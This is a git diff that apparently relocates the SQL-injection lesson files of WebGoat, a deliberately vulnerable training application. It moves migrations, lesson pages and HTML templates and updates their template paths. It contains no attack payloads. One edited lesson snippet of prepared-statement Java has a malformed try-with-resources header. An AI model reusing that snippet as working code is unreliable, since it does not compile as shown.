diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_1__servers.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_1__servers.sql
similarity index 54%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_1__servers.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_1__servers.sql
index 6dbdb7762..b9f036dbd 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_1__servers.sql
+++ b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_1__servers.sql
@@ -1,4 +1,4 @@
-CREATE TABLE servers(
+CREATE TABLE SERVERS(
   id varchar(10),
   hostname varchar(20),
   ip varchar(20),
@@ -6,8 +6,8 @@ CREATE TABLE servers(
   status varchar(20),
   description varchar(40)
 );
-INSERT INTO servers VALUES ('1', 'webgoat-dev', '192.168.4.0', 'AA:BB:11:22:CC:DD', 'online', 'Development server');
-INSERT INTO servers VALUES ('2', 'webgoat-tst', '192.168.2.1', 'EE:FF:33:44:AB:CD', 'online', 'Test server');
-INSERT INTO servers VALUES ('3', 'webgoat-acc', '192.168.3.3', 'EF:12:FE:34:AA:CC', 'offline', 'Acceptance server');
-INSERT INTO servers VALUES ('4', 'webgoat-pre-prod', '192.168.6.4', 'EF:12:FE:34:AA:CC', 'offline', 'Pre-production server');
-INSERT INTO servers VALUES ('4', 'webgoat-prd', '104.130.219.202', 'FA:91:EB:82:DC:73', 'out of order', 'Production server');
+INSERT INTO SERVERS VALUES ('1', 'webgoat-dev', '192.168.4.0', 'AA:BB:11:22:CC:DD', 'online', 'Development server');
+INSERT INTO SERVERS VALUES ('2', 'webgoat-tst', '192.168.2.1', 'EE:FF:33:44:AB:CD', 'online', 'Test server');
+INSERT INTO SERVERS VALUES ('3', 'webgoat-acc', '192.168.3.3', 'EF:12:FE:34:AA:CC', 'offline', 'Acceptance server');
+INSERT INTO SERVERS VALUES ('4', 'webgoat-pre-prod', '192.168.6.4', 'EF:12:FE:34:AA:CC', 'offline', 'Pre-production server');
+INSERT INTO SERVERS VALUES ('4', 'webgoat-prd', '104.130.219.202', 'FA:91:EB:82:DC:73', 'out of order', 'Production server');
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_2__users.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_2__users.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_2__users.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_2__users.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_3__salaries.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_3__salaries.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_3__salaries.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_3__salaries.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_4__tan.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_4__tan.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_4__tan.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_4__tan.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_5__challenge_assignment.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_5__challenge_assignment.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_5__challenge_assignment.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_5__challenge_assignment.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_6__user_system_data.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_6__user_system_data.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_6__user_system_data.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_6__user_system_data.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_7__employees.sql b/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_7__employees.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2019_09_26_7__employees.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_7__employees.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/db/migration/V2021_03_13_8__grant.sql b/src/main/resources/lessons/sql_injection/db/migration/V2021_03_13_8__grant.sql
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/db/migration/V2021_03_13_8__grant.sql
rename to src/main/resources/lessons/sql_injection/db/migration/V2021_03_13_8__grant.sql
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjectionAdvanced_plan.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjectionAdvanced_plan.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjectionAdvanced_plan.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjectionAdvanced_plan.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_challenge.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_challenge.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_challenge.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_challenge.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content10.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content10.adoc
similarity index 94%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content10.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content10.adoc
index a407cf1af..36edbdb3a 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content10.adoc
+++ b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content10.adoc
@@ -6,7 +6,7 @@ public static String loadAccount() {
   String accountID = getParser().getStringParameter(ACCT_ID, "");
   String data = null;
   String query = "SELECT first_name, last_name, acct_id, balance FROM user_data WHERE acct_id = ?";
-  try (Connection connection = null;
+  try (Connection connection = dataSource.getConnection()) {
        PreparedStatement statement = connection.prepareStatement(query)) {
      statement.setString(1, accountID);
      ResultSet results = statement.executeQuery();
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content11.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content11.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content11.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content11.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content12.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content12.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content12a.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12a.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content12a.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12a.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content12b.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12b.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content12b.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12b.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content13.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content13.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content13.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content13.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content14.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content14.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content14.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content14.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6a.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6a.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6a.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6a.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6c.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6c.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6c.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6c.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content7.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content7.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content7.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content7.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content8.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content8.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content8.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content8.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content9.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content9.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content9.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_content9.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content1.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content1.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content1.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content1.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content10.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content10.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content10.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content10.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content11.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content11.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content11.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content11.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content12.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content12.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content12.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content12.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content2.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content2.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content2.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content2.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content3.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content3.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content3.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content3.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content4.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content4.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content4.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content4.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content5_after.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_after.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content5_after.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_after.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content5_before.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_before.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content5_before.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_before.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content6.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content6.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content6.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content6.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content7.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content7.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content7.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content7.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content8.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content8.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content8.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content8.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content9.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content9.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_content9.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content9.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_plan.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_plan.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_introduction_plan.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_plan.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_jdbc_completion.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_completion.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_jdbc_completion.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_completion.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_jdbc_newcode.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_newcode.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_jdbc_newcode.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_newcode.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_order_by.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_order_by.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_quiz.adoc b/src/main/resources/lessons/sql_injection/documentation/SqlInjection_quiz.adoc
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_quiz.adoc
rename to src/main/resources/lessons/sql_injection/documentation/SqlInjection_quiz.adoc
diff --git a/webgoat-lessons/sql-injection/src/main/resources/html/SqlInjection.html b/src/main/resources/lessons/sql_injection/html/SqlInjection.html
similarity index 84%
rename from webgoat-lessons/sql-injection/src/main/resources/html/SqlInjection.html
rename to src/main/resources/lessons/sql_injection/html/SqlInjection.html
index b505801ea..fb2b169a2 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/html/SqlInjection.html
+++ b/src/main/resources/lessons/sql_injection/html/SqlInjection.html
@@ -5,12 +5,12 @@
 
 <!--Page 1-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_plan.adoc"></div>
 </div>
 
 <!--Page 2-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content1.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content1.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -34,7 +34,7 @@
 
 <!--Page 3-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content2.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content2.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -58,7 +58,7 @@
 
 <!--Page 4-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content3.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content3.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -82,7 +82,7 @@
 
 <!--Page 5-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content4.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content4.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -106,7 +106,7 @@
 
 <!--Page 6-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content5_before.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content5_before.adoc"></div>
     <div>
         <label for="username-preview">Username:</label>
         <input id="preview-input" type="text" name="username" val=""/>
@@ -123,22 +123,22 @@
             });
         </script>
     </div>
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content5_after.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content5_after.adoc"></div>
 </div>
 
 <!--Page 7-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content6.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content6.adoc"></div>
 </div>
 
 <!--Page 8-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content7.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content7.adoc"></div>
 </div>
 
 <!--Page 9-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content11.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content11.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -183,7 +183,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content12.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content12.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -211,7 +211,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content8.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content8.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -239,7 +239,7 @@
 
 <!--Page 10-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content9.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content9.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -267,7 +267,7 @@
 
 <!--Page 11-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_introduction_content10.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content10.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
diff --git a/webgoat-lessons/sql-injection/src/main/resources/html/SqlInjectionAdvanced.html b/src/main/resources/lessons/sql_injection/html/SqlInjectionAdvanced.html
similarity index 92%
rename from webgoat-lessons/sql-injection/src/main/resources/html/SqlInjectionAdvanced.html
rename to src/main/resources/lessons/sql_injection/html/SqlInjectionAdvanced.html
index 9e68fa547..b3c9e6bec 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/html/SqlInjectionAdvanced.html
+++ b/src/main/resources/lessons/sql_injection/html/SqlInjectionAdvanced.html
@@ -5,17 +5,17 @@
 
 <!-- 1 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjectionAdvanced_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjectionAdvanced_plan.adoc"></div>
 </div>
 
 <!-- 2 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content6.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content6.adoc"></div>
 </div>
 
 <!-- 3 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content6a.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content6a.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -51,10 +51,10 @@
 
 <!-- 4 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content6c.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content6c.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_challenge.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_challenge.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/challenge.css}"/>
     <script th:src="@{/lesson_js/challenge.js}" language="JavaScript"></script>
     <div class="attack-container">
@@ -162,7 +162,7 @@
     <link rel="stylesheet" type="text/css" th:href="@{/css/quiz.css}"/>
     <script th:src="@{/js/quiz.js}" language="JavaScript"></script>
     <link rel="import" type="application/json" th:href="@{/lesson_js/questions.json}"/>
-    <div class="adoc-content" th:replace="doc:SqlInjection_quiz.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_quiz.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <div class="container-fluid">
diff --git a/webgoat-lessons/sql-injection/src/main/resources/html/SqlInjectionMitigations.html b/src/main/resources/lessons/sql_injection/html/SqlInjectionMitigations.html
similarity index 84%
rename from webgoat-lessons/sql-injection/src/main/resources/html/SqlInjectionMitigations.html
rename to src/main/resources/lessons/sql_injection/html/SqlInjectionMitigations.html
index 410f95a50..5a72e0a99 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/html/SqlInjectionMitigations.html
+++ b/src/main/resources/lessons/sql_injection/html/SqlInjectionMitigations.html
@@ -4,23 +4,23 @@
 <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/assignments.css}"/>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content7.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content7.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content8.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content8.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content9.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content9.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content10.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content10.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_jdbc_completion.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_jdbc_completion.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN" method="POST" name="form" action="/WebGoat/SqlInjectionMitigations/attack10a">
@@ -40,7 +40,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_jdbc_newcode.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_jdbc_newcode.adoc"></div>
     <div class="attack-container" style="border: none !important; height: 100%; min-height: 300px;">
         <form id="codesubmit" style="height: 100%; min-height: 300px;" class="attack-form" accept-charset="UNKNOWN" method="POST" name="form" action="/WebGoat/SqlInjectionMitigations/attack10b">
             <div>
@@ -60,14 +60,14 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content11.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content11.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content12.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content12.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content12a.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content12a.adoc"></div>
     <div class="attack-container">
